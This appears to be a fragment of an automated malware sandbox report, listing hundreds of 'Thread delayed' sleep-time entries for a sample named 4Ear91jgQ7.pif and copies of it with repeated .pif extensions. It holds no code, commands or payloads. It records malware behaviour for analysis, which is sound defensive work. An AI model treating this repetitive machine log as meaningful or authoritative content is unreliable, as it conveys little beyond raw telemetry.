            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 599530
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 599421
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 599300
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 599172
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 599056
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 598953
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 598843
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 598732
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 598474
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 598215
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 598016
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597906
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597793
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597671
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597559
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597452
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597344
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597229
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597124
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 596953
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 596812
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 596672
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 596500
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 596281
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 595969
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 595797
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 595609
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 595406
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 595187
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 595042
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 594922
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 594765
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 594640
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 594496
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 600000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 599765
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 599578
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 599375
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 599156
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 599006
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 598781
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 598562
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 598390
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 598187
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 598000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 597797
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 597484
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 597218
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 596984
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 596765
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 596593
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 596465
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 596323
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 595984
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 595854
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 595703
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 595547
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 595375
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 595218
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 595047
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 594887
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 594758
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 594625
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 594495
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 594347
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 594215
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 594070
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 593936
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 593593
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 593457
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 593296
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 593156
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 593029
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 592890
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 592750
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 592573
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 592452
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 592315
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 592150
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 600000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 599812
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 599667
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 599541
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 599437
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 599328
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 599217
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 599109
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 598978
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 598850
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 598734
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 598618
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 598515
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 598393
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 598265
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 598140
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 597966
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 597845
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 597734
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 597590
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 597468
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 597336
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 597229
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 597106
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 597000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 596888
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 596781
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 596671
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 596562
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 596452
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 596343
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 596234
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 596124
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 596015
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 595906
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 595765
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 595547
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 595434
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 595328
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 595214
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 595109
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 595000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 594886
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 594780
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 594656
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 594546
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 594437
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 594314
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 594187
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 600000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 599812
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 599629
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 599503
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 599375
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 599251
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 599117
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 598996
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 598886
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 598751
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 598390
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 598234
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 598091
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597937
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597802
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597656
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597518
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597382
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597271
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597124
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596984
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596875
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596734
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596591
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596481
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596363
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596223
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596094
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595984
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595862
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595736
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595609
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595492
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595379
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595250
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595139
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595028
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594900
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594783
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594656
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594544
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594431
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594307
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594045
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593875
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593765
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593656
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593547
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593437
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593328
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593218
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593107
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 600000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 599610
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 599360
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 599172
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 599000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 598782
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 598578
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 598372
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 598125
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597922
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597735
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597593
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597472
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597328
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597203
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597094
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596962
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596835
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596723
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596594
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596469
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596357
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596234
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596108
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595958
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595826
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595710
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595532
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595313
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595032
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594877
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594735
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594615
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594453
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594327
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594187
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 594047
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593874
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593749
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593614
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593485
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 593360
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 600000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599844
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599688
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599484
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599334
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599141
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598986
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598846
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598719
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598577
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598203
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597828
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597707
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597578
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597452
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597340
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597223
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597093
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596906
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596797
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 578422
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 600000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599871
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599759
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599643
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599520
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599379
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599265
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599153
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 599046
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598937
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598828
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598718
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598609
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598499
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598390
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598254
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598140
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 598031
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597920
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597812
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597703
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597593
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597484
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597375
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597251
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 597109
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596991
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596890
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596781
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596672
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596562
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596452
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596343
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596234
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596125
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 596015
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595906
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595796
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595687
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595578
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595468
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595359
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595250
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595140
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 595031
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 594922
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifThread delayed: delay time: 594806
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 600000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 599871
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 599754
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 599625
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 599516
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 599381
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 599234
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 599117
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 598995
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifThread delayed: delay time: 598875
